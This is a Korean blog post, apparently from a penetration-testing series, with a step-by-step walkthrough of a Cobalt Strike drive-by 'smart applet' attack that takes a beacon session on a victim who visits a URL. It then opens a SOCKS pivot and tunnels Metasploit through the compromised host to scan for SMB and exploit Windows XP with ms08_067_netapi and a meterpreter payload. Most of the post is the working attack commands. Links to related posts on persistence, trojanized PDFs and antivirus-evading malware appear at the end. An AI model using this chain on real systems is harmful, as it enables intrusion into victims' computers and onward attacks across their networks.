1.코볼트 스트라이크 내에서 Attacks - web drive-by - smart applet attack 으로 악성코드를 만들어 줍니다.
2.로컬 URL 주소를 넣어주고 아이피는 공격자 아이피, 포트는 80으로 생성, 리스너를 생성해주는데 편한이름 편한 포트번호로 생성후 launch
3.피해자가 해당 url 주소에 들어가면 세션이 -> 피해자 컴퓨터에 우클릭 -> interact 클릭
4.밑의 명령프롬프트에 sleep 0를 넣어준다. [비컨 세션이 계속 연결됩니다. 디폴트는 60초로 60초마다 세션연결이 되는것]
5.socks [아무포트번호] 로 socks 서버를 오픈해줍니다.
6.상단 메뉴의 view - proxy pivots -> socks 서버를 누른뒤 tunnel 클릭 -> 나온 터널 링크 복사후 확인
7.postgresql 틀고 msfconsole 들어간뒤 아까 복사한 터널주소 붙여넣기
그러면 msf 로 해킹하는것들이 피해자 컴에서 해킹한 것으로 이루어지게 됩니다
8.여기서 예를들어 xp를 해킹하겠다 하면 msf에서 use auxiliary/scanner/smb/smb_version
모듈로 smb 스캐닝을 할 수 있고
set rhosts 192.168.0.7/24 -> 해당 네트워크 위의 모든 포트 및 네트워크 검색
set threads 64
exploit -j [백그라운드 실행] 를 사용하여 스캐닝 하여 xp 사용자를 찾습니다.
9.use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set rhost [xp 컴 아이피]
show options 커맨드로 확인
exploit -j 를 사용하여 xp를 공격합니다.
10.해킹 후 shell 에 가서 netstat -na | findstr "EST" 를 사용하여 established 즉 확립된 netstat만 확인을 해보시면
피해자의 컴퓨터와 xp 피해자의 컴퓨터와만 연결이 확립, 즉 피해자 컴퓨터가 xp 피해자 컴퓨터를 해킹하게 된 상황이 보이게 됩니다.
'2. 시스템 해킹 및 모의 해킹' 카테고리의 다른 글
껐다 켜도 해킹 세션을 유지시키는 방법 [persistence] (0) | 2023.12.27 |
---|---|
MSF pdf파일을 트로이목마로 만들기 (0) | 2023.12.27 |
트로이목마 악성코드 분석해보기 [sysinternals 툴] (0) | 2023.12.27 |
컴퓨터를 해킹해서 원격으로 조종하는 툴 [cobaltStrike] (0) | 2023.12.27 |
백신에 탐지되지 않는 바이러스 생성 툴 [Veil] (0) | 2023.12.27 |